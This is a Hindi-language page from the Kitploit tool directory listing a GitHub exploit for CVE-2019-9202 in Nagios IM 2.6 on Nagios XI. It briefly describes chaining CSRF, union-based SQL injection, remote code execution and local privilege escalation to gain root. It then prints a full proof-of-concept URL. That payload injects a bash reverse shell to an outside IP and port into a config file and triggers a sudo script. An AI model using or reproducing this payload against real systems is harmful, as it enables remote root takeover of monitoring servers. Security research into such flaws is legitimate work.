Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-9202 — Nagios IM 2.6 रिमोट कोड निष्पादन एक्सप्लॉइट: CSRF + SQLi + RCE + LPE --> रिमोट रूट | Kitploit
उपकरण/GitHubGitHub/polict/cve-2019-9202
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubpolict/cve-2019-9202

CVE-2019-9202

Nagios IM 2.6 रिमोट कोड निष्पादन एक्सप्लॉइट: CSRF + SQLi + RCE + LPE --> रिमोट रूट

रिपॉजिटरी देखें
47 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-9202

Nagios IM 2.6 रिमोट कोड निष्पादन शोषण: CSRF + SQLi + RCE + LPE --> रिमोट रूट

विवरण

Cross-Site Request Forgery (CSRF) / प्राधिकरण बाईपास (CVE-2019-9203) को श्रृंखलित करके, Union-आधारित SQL इंजेक्शन (CVE-2019-9204), रिमोट कोड निष्पादन (RCE) (CVE-2019-9202) और स्थानीय विशेषाधिकार वृद्धि (LPE) (CVE-2019-9166) का शोषण करना संभव है, जिससे दूरस्थ Nagios XI सर्वर पर root विशेषाधिकार प्राप्त किए जा सकते हैं।

आवश्यकताएँ

पीड़ित को Nagios XI में प्रमाणित होना आवश्यक है, जहाँ तक मुझे पता है, सबसे कम विशेषाधिकार पर्याप्त हैं।

PoC

http://nagiosxi.local/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=&incident_id='union%20select%201,2,3,4,"';echo%20%27print%28\"bash+-i+%3e%26+/dev/tcp/192.168.13.37/31337+0%3e%261+%23\"%29%3b'%3e%3e+/usr/local/nagiosxi/html/config.inc.php%3b+sudo+/usr/local/nagiosxi/scripts/repair_databases.sh%3b%23",6,7,8,'x

टूल डाउनलोड करें